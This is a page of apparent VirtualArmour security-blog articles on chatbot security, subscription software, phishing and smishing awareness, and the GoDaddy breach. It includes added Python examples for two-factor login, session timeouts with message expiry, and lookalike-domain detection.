Virtual Armour
Hack the Chat

Last updated August 19, 2022

Summary:

  • By the end of 2022, 70% of white-collar workers will interact with chatbots on a daily basis—but chatbots can pose a cybersecurity risk if they are not properly protected.
  • Chatbots can improve customer experience by identifying leads in real time, improving user engagement, and collecting user data for A/B testing.
  • However, cybercriminals can exploit chatbots to impersonate people, deliver malware, steal or alter data, and launch phishing attacks.
  • Common chatbot vulnerabilities include unencrypted communications, allowing back-door access, missing protocols, and hosting platform issues.
  • Types of chatbot attacks include network hacks, social engineering attacks, and real-time chatbot takeovers.
  • Software updates, working with experienced chatbot developers, restricting chatbot access to registered users, and implementing multi-factor authentication can all make your chatbot usage more secure.
  • Web Application Firewalls, end-to-end encryption on messages, authentication timeouts, self-destructing messages, and other strategies can also improve chatbot security.

Chatbots, those little customer service pop-up menus on websites that ask how they can help you, are becoming ubiquitous, changing how users interact with both websites and the businesses behind them. 

Machine-learning programs such as Siri, Alexa, Google Assistant, and website chatbots have become one of the fastest online sales-generating tools businesses have at their disposal. A 2016 study by Oracle found that 80% of businesses planned to onboard customer interaction AIs to their website, and a 2019 article by Gartner predicts that by the end of 2022, a full 70% of white-collar workers will interact with conversational platforms (chatbots) daily. 

However, while website chatbots are incredibly useful, they can also pose a security risk if appropriate cybersecurity measures aren’t taken. In this article, we will discuss how chatbots can leave your organization vulnerable to new hacking tactics and explore steps your organization should be taking to secure your website chatbot.

If your organization has recently experienced, or is currently experiencing, a cybersecurity incident such as a chatbot hack, please contact our team right away and consider reviewing our educational article: Hacked? Here’s What to Know (and What to Do Next).

How Chatbots Can Improve the Customer Experience

Chatbots offer many advantages to both customers and businesses. Chatbots allow customers to independently move down the sales funnel, offer users more information about your company’s products and services, and provide your company with valuable data on customer interests. 

By taking over these functions from live staff members, businesses can free up valuable team members for other business-building activities or reallocate the funds that would have been spent on sales staff wages for other uses. Chatbots are also not constrained by reasonable shift lengths or labor laws and never need sick days or vacations.  

When implemented correctly, chatbots can:

Identify Leads in Real Time

Chatbots allow you to engage with customers while they are using your app or website, catching them when they are most engaged. They also allow customers to get answers to common questions right away (an IBM study found chatbots can handle 80% of routine tasks and customer questions) and make the entire website experience more engaging. Chatbots can also gently guide customers towards the next sales funnel stage.

Improve User Engagement

Unlike human beings, chatbots can easily engage with multiple customers at once without losing focus. They can also regularly send customers product updates and offers, offer instant responses to customer inquiries, and are available 24/7/365. They can also be programmed using multiple languages to better engage with all of your target demographics.

Collect Valuable User Data & Engage in A/B Testing

Modern marketing runs on user data, and chatbots are well-positioned to collect it. Chatbots can seamlessly gather customer data in real-time (and ask follow-up questions to gain more information), analyze the data, and provide you with the information you need to continue to improve your products or services and reach new consumers.

Chatbots also allow you to conduct multiple A/B tests simultaneously (and much faster than manual A/B testing) and swiftly provide your team with test results and the chatbot’s analysis.

Chatbot Risks

Chatbots are a valuable tool, but like any digital tool, they are also vulnerable to cybercriminals. Without proper security precautions in place, chatbots can be used to:

  • Impersonate individuals 
  • Deliver ransomware and other forms of malware
  • Engage in data theft
  • Alter data
  • Engage in phishing or whaling attacks

Many companies offer chatbot programs, but not every chatbot is as secure as it could be. Common chatbot vulnerabilities include:

  • Unencrypted communications
  • Allowing back-door access
  • Missing protocols
  • Hosting platform issues

Hack the Chat: How Bad Actors Are Taking Advantage of Chatbots

Before you implement a chatbot, you should ensure it meets your company’s existing security standards and make sure your team is aware of the types of attacks cybercriminals commonly use against chatbots.

Types of Chatbot Attacks

Network Hacks

Much like a burglar can creep through an unlocked window, cybercriminals can use unsecured or insufficiently secured chatbots to gain access to your network. As such, cybercriminals will frequently evaluate chatbots for potential vulnerabilities that can be exploited to gain wider network access.

Social Engineering Attacks Using Chatbots

Cybercriminals can also turn chatbots into tools of their own. If a cybercriminal already has an existing customer’s username, they may be able to leverage the chatbot in a social engineering scheme to reset the account password (granting the cybercriminal access), make unauthorized purchases, or change the payment information on the user’s account.

Real-time Chatbot Takeovers

In this scenario, a cybercriminal would have to have already infiltrated your website and be in a position to intercept customer communication via the chatbot. Because chatbots are an extension of your company, customers may let their guard down as they would around one of your human employees. 

Cybercriminals can take advantage of that presumed trust to ask users for sensitive personal information, such as social insurance numbers or credit card numbers, or direct users to send funds outside of usual payment avenues. 

Safeguard Your Website With These Chatbot Best Practices

Keep Your Software Up to Date

One of the easiest things any company can do to quickly improve their security is keep their software up to date. When software developers discover vulnerabilities, bugs, or other issues with their programs, they release patches to fix them. By downloading all security patches as soon as they become available, you can proactively safeguard your network and the digital assets stored on it. 

Unpatched software is also particularly vulnerable. Companies typically announce when a patch is released, alerting both legitimate users and cybercriminals. This can inadvertently increase a company’s chances of being targeted by cybercriminals as these criminals redirect their attention to companies that they know are using the recently patched software in the hopes of exploiting the vulnerability before all network users have downloaded the patch.

Hire an Experienced Chatbot Developer

While you may be excited to get your chatbot up and running, it pays to shop around and find a developer with chatbot security and design experience. Before you begin production, make sure to ask your developer how they plan to secure your chatbot and make sure their plan meets your high security standards.

Restrict Chatbot Use to Registered Users Only

While restricting chatbot use privileges to registered users may hinder your efforts somewhat from a sales perspective, it can pay attractive security dividends. Cybercriminals are always on the lookout for easy targets, and adding this extra layer of security both eliminates (or at least reduces) anonymity and makes your website chatbot a less appealing target. Requiring users to register with your website before using the chatbot is an easy to implement and cost-effective security measure.

Implement Two-Factor Authentication

In addition to requiring usernames and passwords, you may want to consider implementing two-factor authentication. This adds an extra layer of security during the login process, requiring users to enter two different pieces of information to verify their identity. 

This often takes the form of a strong password paired with a text message prompt or a hardware element. As such, for a cybercriminal to successfully log in to a legitimate user’s account, they would need the user’s username and password as well as access to the one-time code sent to the user’s phone or the physical hardware element attached to that user’s account.
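As an added illustration of the two pieces of information described above (example code written for this article, not VirtualArmour’s own software or any vendor’s product), the following Python sketch pairs a salted password check with a single-use, short-lived one-time code of the kind delivered to a user’s phone. The class and constant names, the five-minute code lifetime and the five-attempt limit are assumptions made for the example; delivering the code by text message is left to the caller.

```python
import hashlib
import hmac
import os
import secrets
import time

# Constructed example: a second factor for a chatbot login, made of a salted
# password hash plus a single-use one-time code. Lifetime and attempt limit
# are assumptions chosen for this illustration.
CODE_TTL_SECONDS = 300      # the one-time code is valid for five minutes
CODE_MAX_ATTEMPTS = 5       # after this many wrong guesses the code is discarded


def hash_password(password, salt=None):
    """Derive a PBKDF2-HMAC-SHA256 digest; returns (salt, digest)."""
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)
    return salt, digest


class TwoFactorLogin:
    def __init__(self):
        self._users = {}     # username -> (salt, password digest)
        self._pending = {}   # username -> [code, expiry time, attempts left]

    def register(self, username, password):
        self._users[username] = hash_password(password)

    def check_password(self, username, password):
        """First factor: constant-time comparison against the stored digest."""
        record = self._users.get(username)
        if record is None:
            hash_password(password)   # keep timing similar for unknown usernames
            return False
        salt, digest = record
        _, candidate = hash_password(password, salt)
        return hmac.compare_digest(candidate, digest)

    def begin_second_factor(self, username, now=None):
        """Issue a fresh six-digit code; the caller sends it to the user's phone."""
        now = time.time() if now is None else now
        code = "{:06d}".format(secrets.randbelow(1_000_000))
        self._pending[username] = [code, now + CODE_TTL_SECONDS, CODE_MAX_ATTEMPTS]
        return code

    def complete_second_factor(self, username, submitted, now=None):
        """Second factor: accept the code once, while unexpired, within the attempt budget."""
        now = time.time() if now is None else now
        entry = self._pending.get(username)
        if entry is None:
            return False
        code, expires_at, attempts_left = entry
        if now > expires_at or attempts_left <= 0:
            del self._pending[username]
            return False
        if hmac.compare_digest(code, submitted):
            del self._pending[username]   # single use: a replayed code is refused
            return True
        entry[2] -= 1
        return False
```

The two checks are deliberately separate calls: the code is only issued after the password succeeds, and a correct code is consumed on first use, so an attacker who has the password alone, or who captured an already-used code, cannot complete the login.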

Install a Web Application Firewall (WAF)

Web application firewalls are designed to safeguard your website from malicious traffic and harmful requests. This is critical since it could help prevent cybercriminals or their botnet from using your chatbot to inject malicious code into your network (such as during a ransomware or other malware attack). 

Implement End-to-End Encryption on Chatbot Messages

End-to-end encryption is a critical security measure and should be used both for chatbot conversations and in any context where a message is sent from one person or entity to another (including chatbot sessions, email, and internal employee chat programs). 

Implement Authentication Timeouts

Authentication timeouts limit how long a user remains logged in before they are automatically logged out. If a user stays logged in but inactive for too long, a prompt window asks them to re-enter their login credentials or confirm that they are still active; the prompt may also simply inform the user that they have been logged out. This simple design change can prevent crimes of opportunity, where a cybercriminal takes advantage of a still-logged-in session to wreak havoc. 

Self-Destructing Messages

While this may sound like something out of a spy movie, self-destructing messages are a great way to make your chatbot more secure. This security measure is just what it sounds like: either after a chat session has concluded or a select amount of time has elapsed, all messages sent to the chatbot and any sensitive information shared with it are automatically erased. While some users may find this inconvenient, the inconvenience is outweighed by this approach’s security benefits.  
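The two session controls just described, authentication timeouts and self-destructing messages, can be seen together in one small in-memory session store. The Python below is an added example for this article, not code from VirtualArmour or any chatbot vendor; the timeout values, message lifetime, class names and the in-memory dictionary are all assumptions made for the illustration.

```python
from dataclasses import dataclass, field

# Constructed example: a chatbot session store with an idle timeout, an absolute
# timeout, and message expiry. All limits below are assumptions for this sketch.
IDLE_TIMEOUT_SECONDS = 15 * 60        # log out after 15 minutes without activity
ABSOLUTE_TIMEOUT_SECONDS = 8 * 3600   # log out regardless of activity after 8 hours
MESSAGE_TTL_SECONDS = 10 * 60         # erase each message 10 minutes after it was sent


@dataclass
class Session:
    user: str
    created_at: float
    last_seen: float
    messages: list = field(default_factory=list)   # entries are (sent_at, text)
    active: bool = True


class ChatSessionStore:
    def __init__(self):
        self._sessions = {}

    def open(self, session_id, user, now):
        """Called after a successful login; starts both timers."""
        self._sessions[session_id] = Session(user, now, now)

    def is_authenticated(self, session_id, now):
        """Expire the session on idle or absolute timeout; the caller must re-prompt for login."""
        s = self._sessions.get(session_id)
        if s is None or not s.active:
            return False
        idle_expired = now - s.last_seen > IDLE_TIMEOUT_SECONDS
        absolute_expired = now - s.created_at > ABSOLUTE_TIMEOUT_SECONDS
        if idle_expired or absolute_expired:
            self.close(session_id)
            return False
        return True

    def record_message(self, session_id, text, now):
        """Store a message only for a live session and refresh the idle timer."""
        if not self.is_authenticated(session_id, now):
            return False
        s = self._sessions[session_id]
        s.last_seen = now
        s.messages.append((now, text))
        return True

    def close(self, session_id):
        """Ending a session erases its transcript immediately (self-destruct on close)."""
        s = self._sessions.get(session_id)
        if s is not None:
            s.active = False
            s.messages.clear()

    def purge_expired_messages(self, now):
        """Periodic sweep: erase messages older than MESSAGE_TTL even in live sessions."""
        removed = 0
        for s in self._sessions.values():
            kept = [(t, m) for (t, m) in s.messages if now - t <= MESSAGE_TTL_SECONDS]
            removed += len(s.messages) - len(kept)
            s.messages = kept
        return removed

    def transcript(self, session_id):
        """What is still retrievable for a session; empty once it has been closed."""
        s = self._sessions.get(session_id)
        return [] if s is None else [m for (_, m) in s.messages]
```

The idle timer is refreshed only by real activity, the absolute timer is never refreshed, and both `close` and the periodic purge remove message text rather than merely hiding it, so a later takeover of the session or the store finds nothing older than the retention window.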

Put Your Chatbot to the Test With Pen Testing

As the old saying goes, the best defense is a good offense. Pen (penetration) testing involves hiring an ethical hacker (sometimes called a “white hat”) to stress test your defenses and try to break into your network. The pen tester documents any security gaps or deficiencies they find and then shares their findings and their recommendations with you and your security team once the test is complete. 

By proactively seeking out vulnerabilities, you can ensure these shortcomings are addressed before any actual cybercriminals can exploit them. 

Consider Offering a Bug Bounty

While this option can be risky because it involves actively inviting technically-savvy users to look for security issues, offering a bug bounty can also pay off. Bug bounties are just what they sound like: if a user finds a security bug and tells your team about it, you offer them a reward as a thank you. 

Chatbots can be a great way to reach customers, improve the customer experience, and help move potential customers down the sales funnel. However, like all digital tools, chatbots can pose a risk to your company’s overall security if appropriate measures aren’t taken. 

Worried Your Chatbot Is a Security Liability? VirtualArmour Is Here to Help

Not everyone is a cybersecurity expert, and that’s okay. The VirtualArmour team is staffed by security experts from a wide selection of cybersecurity and IT disciplines. Whether you’re starting from scratch or improving an existing website or chatbot, our team is here to help. We offer a variety of services, including vulnerability scanning and managed firewall services.

For more information, or to start improving your company’s security posture, please contact our team.

Subscription Model Software: Pros and Cons

Last updated August 19, 2022

Summary:

  • Subscription-based cloud and managed IT and security services help SMBs eliminate the up-front costs of setting up their own in-house systems.
  • Managing IT and cybersecurity systems is time-consuming, and can drain critical resources from an organization during incidents, disrupting profits and business operations.
  • Subscribing to a SaaS company provides instant updates, bug fixes, and new features while reducing initial costs.
  • Subscription services often take a modular or à la carte approach, allowing them to be personalized to each client and to scale with the organizations that use them.
  • The set fees associated with subscription software also make them easier to budget for and incentivize providers to keep adding value, resulting in improved services over time.

The subscription model has become increasingly popular over the last few years as apps and other services move away from one-time purchase models. Once the domain of magazines and cheese-of-the-month clubs, the model is now being adopted with increasing frequency by service providers in the IT and cybersecurity spaces as software moves from the desktop to the cloud. In this article, we will discuss the benefits of subscription-based IT and cybersecurity platforms for users.

Cloud and managed IT and cybersecurity services, in particular, are an excellent fit for the subscription-based model. Under this model, users don’t purchase software (or software licenses) outright and instead pay a monthly fee per user. 

Complex IT systems are incredibly expensive to set up, maintain, and operate and come with steep upfront costs, putting them out of reach for most small and medium-sized businesses. Both the OPEX and CAPEX of maintaining the hardware and software needed to support complex IT and cybersecurity systems can be unpredictable, making even those SMBs with the budget to attempt a DIY approach hesitant to take this road.

Subscription Models Allow SMBs to Offload the Hassle & Expense of Maintaining Complex Infrastructure

The hardware and software needed to manage IT and cybersecurity systems are complex enough that entire teams of dedicated professionals are required to manage and support them and ensure everything is running smoothly. Should something go wrong, the entire system may grind to a halt until the experts determine what the core problem is. This is completely unacceptable for an SMB, which would need to pull critical team members away from other valuable, revenue-generating tasks to attend to the problem, pausing regular business operations until the situation is resolved. 

By offloading this stress and people-power onto a SaaS (software as a service) company, SMBs can focus on running and growing their business, knowing that if an issue should occur an entire team of dedicated professionals will address it, often before the end user even realizes something was amiss. SaaS companies have one job: to maintain the hardware and software their product needs to run smoothly so that their customers can focus on their business and leave the IT and cybersecurity up to the professionals. 

The User Benefits of Subscription-Based Software Platforms

Your Software is Always Up to Date

There is nothing worse than sitting down at your desk, ready to start the workday, and turning on your computer only to learn that your software requires updating. While many updates only require a few minutes, others can take much longer, leaving workers twiddling their thumbs while the clock ticks. And since desktop-based software requires users to manually trigger updates, many busy SMB IT managers are forced to continually remind their equally busy co-workers to update their software and download new security patches to ensure everyone is using the same version and that the network remains secure.

The subscription model addresses both of these problems by applying all new software updates automatically and, if downtime is required, scheduling them for when the office is closed. This ensures everyone is always using the same version with current security patches, and it eliminates the time wasted while employees wait for software updates to finish. 

Get the Latest Features & Bug Fixes Instantly

Security is everyone’s responsibility, from the summer intern to the CEO. Because subscription-model software is kept up to date automatically, businesses can rest easier knowing that every device on the network has its security patches up to date. This simple action, which the SaaS provider handles for you, has outsized results when it comes to cybersecurity. 

Cybercriminals often target recently patched software, knowing that not all users will be as diligent as your business about installing security patches right away. By handing this responsibility back to the SaaS provider, your busy IT team can get this off their plate and focus on activities that build your business instead of just maintaining its infrastructure. 

Everyone is Always on the Same Page

Automatic updates also ensure that every user on the network is using the same version of every program, eliminating versioning issues across your organization. By ensuring everyone is always on the same page, you can focus on building and growing your business instead of worrying about whether your co-workers will be able to access the report you wrote or if they are seeing something different than you are when they open a file.

Dramatically Reduce Up-Front Costs

Setting up and maintaining your own IT and cybersecurity infrastructure is incredibly expensive and labor-intensive; that is why entire companies are built around providing these services for other businesses. 

The subscription model eliminates the need to purchase a bunch of expensive software licenses upfront (a not insignificant expense, even if your business only has a handful of employees). Offloading the stress and hassle of maintaining a server room or other IT or cybersecurity infrastructure also dramatically reduces CAPEX costs, and not needing to hire an entire team to manage and maintain this infrastructure drastically reduces personnel costs at the same time. 

Hiring even a single IT or cybersecurity professional to wait around in case something goes wrong is an unnecessary expense, using up funds that could be better deployed elsewhere. With the subscription model, if something goes wrong, you can breathe easy knowing an entire team of professionals, whose entire job is to make sure things go smoothly, is already on it. These service providers also invest in layers of hardware redundancy, so if something does go wrong, user traffic can be smoothly rerouted (eliminating or at least dramatically reducing downtime) while the experts get to the root of the problem.  

Shop Around Before You Commit

Software licenses can be very expensive, so you want to make sure you have chosen the right tool for the job before you hand over your business’ hard-earned funds. Because the subscription model dramatically reduces these upfront costs, it is much easier to shop around for a SaaS provider that offers a product that meets your team’s needs and plays nicely with your existing infrastructure. 

Scale Your Subscription to Meet Your Current Organizational Needs

When you purchase a software license up-front, you are often locked into a contract that lasts at least a year and may not be easy to cancel. By opting for a provider that operates using a subscription model, you are never paying for more licenses than you are actually using at any point in time, and scaling up or down to meet your organization’s shifting needs is as easy and painless as a few clicks of a button. 

Also, because SaaS subscription models are specifically designed to scale smoothly, you can avoid the headache and lost productivity associated with finding a new vendor should you outgrow your current software solution. 

Multi-Tier Approach & Personalized Options to Suit Your Needs

Every business is unique and has unique IT and cybersecurity needs and concerns that need to be addressed. Many SaaS providers offer multiple tiers for users to choose from so client companies can select the best tier to meet their needs. For example, VirtualArmour offers two tiers: essential services and premium services.

Many of these services can also be personalized using an à la carte approach that allows users to pick and choose between multiple services so they can curate a package that suits their needs. This not only gives users more granularity over their solution but eliminates the need to pay for services a particular company doesn’t actually need or want. 

Subscription Model Software Makes Budgeting a Breeze

Moving CAPEX into OPEX by opting for a subscription model approach makes it much easier to budget for software expenses. When a software license is purchased outright, most companies offer users a quote based on the customer’s current number of users and (if relevant) the service tier they would require. However, a once cost-effective solution can transform into a huge financial drain if a company scales more rapidly than anticipated (thereby jumping into a higher, more expensive, user number tier) or requires a more personalized approach, achieved via pricy add-on services, than their current providers’ one-size-fits-all approach can offer (the additional cost of which the customer may not have been made aware of before committing to a one year or multi-year contract). 

Software licenses are also typically purchased on contract, meaning you pay for a full year upfront, whether you will use the full year or not. Suppose a pivot or other business change leaves you with a bunch of unnecessary software licenses. In that case, the traditional licensing approach can leave you eating the cost for the whole year, effectively paying for software you aren’t even using. The subscription model offers much more transparent pricing: You pay a set fee per user, which is communicated upfront before signing on the dotted line. If you need to add or subtract users, your price increases or decreases by the previously communicated per-user amount accordingly, and the change is reflected in your next monthly bill. 

Not having to purchase, upgrade, and maintain your own supporting hardware makes it significantly easier to allocate your infrastructure budget since you don’t need to worry about suddenly replacing damaged hardware or pouring your own money into necessary upgrades to ensure your workers can continue to do their jobs effectively. 

Build Relationships

Unlike one-time purchases, the subscription model approach also helps build relationships between providers and users. In addition to providing you with a service, subscription model providers are now invested in helping ensure you and your team are comfortable using their product and pleased with the functionality it offers since an unhappy subscription customer can quickly and easily switch to a competitor. 

Providers are also more likely to proactively solicit and consider user feedback to keep users happy. There is also a strong incentive for the provider to stay up to date on the latest industry developments and continually work to improve their product by adding more features and addressing user concerns promptly and effectively, all while sharing expert knowledge with their customers so users can get the most out of the provider’s product. 

Unlike the one-time purchase model, the subscription model is a natural relationship-building tool, encouraging ongoing communication and feedback between the user and the provider in a way that benefits both parties: providers typically enjoy higher levels of customer loyalty, while users are often given more say in future features and updates.

Reliability You Can Depend On

You have a job to do: yours, not your IT or cybersecurity teams’. The SaaS business model is predicated on making sure all users have the tools they need to do their jobs effectively at all times. To help ensure smooth, uninterrupted service, many SaaS providers invest in multiple layers of hardware redundancy and multiple secure backups (a high but necessary expense, well out of the reach of the average SMB) and employ an entire team of experts whose only goal is to keep things running smoothly. 

Redundant systems also help ensure that impacted user traffic is swiftly and smoothly rerouted until the problem is solved, a process so seamless that many end users might not even realize there was a hiccup in the first place. This allows customers to focus on their business instead of managing their own IT and cybersecurity infrastructure, hiring internal IT or cybersecurity experts using funds better spent elsewhere, or spending money on now-redundant licenses for software they may not even be using anymore. 

Need an Expert? VirtualArmour is Here to Help

Not everyone is an IT or cybersecurity expert, and that’s okay. A good SaaS provider is more than just a service provider; they are a valued partner, working with you and your team to ensure you have the tools you need to do what you do best and leave the hassle and expense of managing your IT or cybersecurity infrastructure up to a trusted team of experts. 

VirtualArmour offers a wide variety of IT and cybersecurity services, including:

We also offer three service tiers to best suit your needs: essential services, premium services, and one-time consulting services. For more information about how we can help support your IT and cybersecurity needs, or to request your free, no-obligation quote, please contact us today.

Phishing Attacks are Evolving: What You Need to Know to Keep Your Company Safe

Last updated August 19, 2022

Summary:

  • Phishing is a form of social engineering where the attacker impersonates a trusted party for the purpose of gaining access to sensitive information like login credentials, personal information, or payment card data.
  • A company with 5000 employees will receive an average of 14,400 phishing emails each year—not including the ones caught by spam filters.
  • Phishing tactics are becoming more advanced over time, and phishing attacks are most common during the holiday season, when consumers often face increased stress levels.
  • SMS phishing scams are on the rise, so it’s vital to use caution if you receive texts from a sender you don’t recognize.
  • Cybersecurity training for employees and visibility scanning are two essential ways to prevent and combat phishing scams. VirtualArmour can provide both of these services.

Phishing scams tend to peak during and around the winter holiday season, catching individuals and businesses alike unprepared. To help ensure you and your team have the information you need to identify and avoid these scams, we sat down with one of our VirtualArmour cybersecurity engineers to learn more about this common cybersecurity threat.

If you are currently experiencing, or have recently experienced, a cybersecurity incident, please contact our team for immediate assistance and consider reviewing our educational article: Hacked? Here’s What to Know (and What to Do Next). Our team can help you fend off the attack, identify the root cause of the issue, and create an actionable, comprehensive plan to help mitigate or even avoid further damage.

What is Phishing?

Phishing is a type of social engineering typically used to steal user data such as login credentials, personally identifiable information (PII), or payment card information. This type of cyber attack involves a threat actor masquerading as a trusted party (such as your bank) in order to trick you into opening an email, text message, instant message, or other electronic message and inadvertently handing over sensitive information such as personally identifiable information (such as your full name, birth date, or social insurance number) or payment information (such as your credit card number). 

Phishing attacks pose a serious threat at both the personal and corporate levels. Though most email spam filters are able to stop the most egregious attempts at phishing, even the best filters and firewalls aren’t able to catch everything. Phishing scams continue to evolve, and the sheer number of phishing emails alone is staggering. Research into the volume of email, spam, and malicious attachments and URLs directed at companies found that a company with 5000 employees will still have an average of 14,400 phishing emails arrive in employee inboxes each year, and those are just the emails crafted well enough to get past the spam filter. 

With so many emails alone slipping past our defenses, employee training on how to spot and report potential phishing scams is key. However, many threat actors are changing tactics and moving away from email and towards other forms of electronic communication.

Phishing Tactics Have Evolved

When many of us think of phishing emails, we likely still picture some scammer pretending to be a fabulously wealthy prince from some faraway land promising riches in return for helping them covertly move money out of their home country (a common ruse referred to as an advance-fee scam).

The advance-fee scam is a classic ruse: the threat actor asks you to help move their money (purportedly for “safekeeping” or to evade authorities) while also asking you to pay a fee to facilitate the transfer, promising that they will both reimburse your advance payment and reward you handsomely for your cooperation.

Though this elaborate ruse has become cliché even outside of cybersecurity circles, unfortunately, many individuals and companies still fall for this and similar advance-fee scams. A recent CNBC article found that these advance-fee scams still net cybercriminals well over $700,000 USD per year.

Why Do Phishing Scams Peak Around the Holiday Season?

Phishing campaigns typically soar in popularity over the holiday season in an attempt to prey on festive (and often frazzled) shoppers using increasingly sophisticated phishing scams. 

However, it isn’t just holiday shoppers that fall for these campaigns; many businesses and other organizations of all sizes continue to fall victim to these types of attacks.

One common example of a business-targeted phishing scam involves sending the target an email containing a link whose domain appears to be the company website, along with seemingly innocuous content (such as a festive meal menu with a .doc file extension, paired with a request that the employee indicate their meal preference and dietary restrictions for the company party). Though the email appears legitimate at first glance, a red flag such as a misspelled domain (for example, ‘virtaularmour.com’ rather than ‘virtualarmour.com’; note the transposed ‘u’ and ‘a’) indicates that the email is likely malicious and should be both flagged as spam and reported to your company’s IT or cybersecurity team.
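The transposed-letter domain above is exactly the kind of thing a mail filter can catch automatically. The Python below is an added example for this article (not VirtualArmour’s filtering, nor any product’s), showing how a defender can score sender and link domains against a list of trusted domains: an exact match or a subdomain of a trusted domain passes, a domain within a small edit distance (including an adjacent swap like ‘ua’ for ‘au’) or one that embeds the brand name elsewhere is flagged as a lookalike. The trusted-domain list, the edit-distance threshold and the sample messages are all constructed for the example.

```python
import re

# Constructed example: detect typo-squatted or brand-embedding domains in a
# message. The trusted domain list and the sample messages are assumptions
# made for this illustration, not data from any real mail system.
TRUSTED_DOMAINS = ("virtualarmour.com",)
MAX_EDIT_DISTANCE = 2   # how close a domain must be to a trusted one to count as a lookalike


def damerau_levenshtein(a, b):
    """Edit distance counting insert, delete, substitute and adjacent swap as one edit each."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1,          # delete
                          d[i][j - 1] + 1,          # insert
                          d[i - 1][j - 1] + cost)   # substitute / match
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)   # transposition, e.g. "ua" <-> "au"
    return d[len(a)][len(b)]


def classify_domain(domain, trusted=TRUSTED_DOMAINS):
    """Return 'trusted', 'lookalike' or 'unrelated' for a host name."""
    domain = domain.lower().strip(".")
    for t in trusted:
        if domain == t or domain.endswith("." + t):
            return "trusted"            # the domain itself or one of its subdomains
    for t in trusted:
        brand = t.rsplit(".", 1)[0]      # e.g. "virtualarmour"
        if damerau_levenshtein(domain, t) <= MAX_EDIT_DISTANCE:
            return "lookalike"          # typo-squat such as transposed or dropped letters
        if brand in domain:
            return "lookalike"          # brand embedded in another domain (virtualarmour.com.evil.example)
    return "unrelated"


def sender_domain(address):
    """Extract the host part of an address such as 'HR <hr@example.com>'."""
    return address.rsplit("@", 1)[-1].strip("<> ").lower()


def link_domains(body):
    """Collect the host of every http(s) URL in the message body."""
    return {m.lower() for m in re.findall(r"https?://([A-Za-z0-9.-]+)", body)}


def check_message(sender, body):
    """Classify sender and link domains; flag the message if any is a lookalike."""
    verdict = {"sender": classify_domain(sender_domain(sender)),
               "links": {d: classify_domain(d) for d in link_domains(body)}}
    verdict["flag"] = (verdict["sender"] == "lookalike"
                       or "lookalike" in verdict["links"].values())
    return verdict
```

Only domains that resemble a trusted one are flagged; unrelated domains are left to the ordinary spam controls, which keeps the check focused on impersonation of your own brand rather than on all external mail.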

“Smishing” (SMS Phishing) Scams Are On the Rise

Though these scams tend to peak around the holiday season, they are common year-round. The fake delivery text, a recent variant of this age-old scam, has been making the rounds and is rapidly becoming one of the most common smishing formats.

One theory behind the rise in this particular style of phishing scam is the increase in lockdowns worldwide, prompting a rise in online shopping, particularly during the holiday period. Before clicking on any links in a suspicious text message, it is critical to verify whether the text message is legitimate (such as by calling your local post office or delivery depot to verify if there really is a parcel waiting for you).

How to Recognize (& Avoid Falling Prey To) a Smishing Attack

If you receive a suspicious text that may be part of a smishing scam, there are a few steps you can take to help avoid falling prey: 

  1. Never respond to a suspicious text message. If a response seems necessary, use a verified official channel instead (such as calling your delivery company or local post office directly).
  2. Never click on links or call phone numbers sent from a sender you don’t recognize.
  3. Never share payment information or personally identifiable information, such as your social security number, birth date, or full name.
  4. Report any messages that appear suspicious to the relevant authority.
    1. In the United Kingdom, reports can be filed with the National Cyber Security Centre.
    2. In the United States, reports can be filed with the FCC and the FTC.

A common example of a scam asking for payment information is a scammer posing as your bank and asking you to update your account information (usually under threat of being locked out of your accounts or some other undesirable outcome). In this case, you should contact your bank immediately via an official channel (most banks print a toll-free number on the back of their credit or debit cards or somewhere on your bank statement) and independently verify that your information requires updating. This not only helps you avoid falling victim to a potential phishing scam but also alerts your bank so they can warn other customers about the scam so they can avoid falling prey as well.


Awareness is Critical

Education and awareness are a cornerstone of any solid cybersecurity strategy. By educating yourself and others about common scams and red flags to look for, you can help reduce the chance someone falls victim. Individual scams are often short-lived, so you need to act quickly; Verizon reports that 50% of scam targets open emails and click on phishing links within an hour of receiving a suspicious email.  

Investing in employee cybersecurity training is vital. When it comes to scams, your employees are one of your first lines of defense, which is why all employees, from the summer intern up to the CEO, should undergo regular cybersecurity training. To help set everyone up for success, you should also include cybersecurity training as part of your company’s onboarding process. 

Vulnerability Scanning Offers Visibility Into Your Infrastructure

You can’t defend against threats you don’t know exist. Vulnerability scanning identifies unpatched software, weak configurations and exposed services before an attacker finds them, and a managed scanning service typically pairs those findings with threat intelligence, device-health data, threat mapping and support ticketing. Continuous monitoring of the traffic on your network complements scanning: it is what lets you spot suspicious activity and respond swiftly and effectively to safeguard your data and your organization should a threat actor slip past your defenses.

Social Engineering Takes Many Forms

Many of these attacks depend on social engineering. Social engineering involves manipulating potential victims into revealing personally identifiable information and can be used to access either personal or organizational accounts. Social engineering attacks typically rely on consistent communication between the attacker and the target and frequently take the form of text messages, instant messages, or emails. 

As COVID-19 continues to force workers to trade their desks at work for their kitchen tables, spare rooms, and home offices, attacks of this nature are becoming more frequent and more effective. This, combined with more mundane but still frustrating events such as a purportedly missed delivery (which you can conveniently reschedule by clicking on this completely legitimate link), has created an ideal environment for threats like phishing scams to flourish. 

Worried About Phishing Scams? VirtualArmour is Here to Help

Not everyone is a cybersecurity expert, and that’s okay. VirtualArmour is full of experts like the cybersecurity engineer who helped us write this educational article. Whether you need help drafting a cybersecurity strategy, are looking for someone to monitor your network 24/7/365 for suspicious activities, or are looking to bolster your internal IT or cybersecurity team, our team is here to help. For more information, or to start improving your organization’s cybersecurity posture, please contact our team today.

About the Author

Kurt Pritchard is a SOC Engineer at VirtualArmour, you can learn more about him on his LinkedIn.

GoDaddy: Have You Been Impacted and What to Do Next?


Last updated August 19, 2022

Summary:

  • In 2021, GoDaddy’s Managed WordPress hosting environment was accessed by an unauthorized third party using a compromised password.
  • The hack accessed the personal data of an estimated 1.2 million Managed WordPress customers, exposing them to potential phishing attacks.
  • Other web hosting providers are also vulnerable to these attacks, which fall into three categories: general web hosting vulnerabilities, shared hosting vulnerabilities, and VPS and cloud-hosting vulnerabilities.
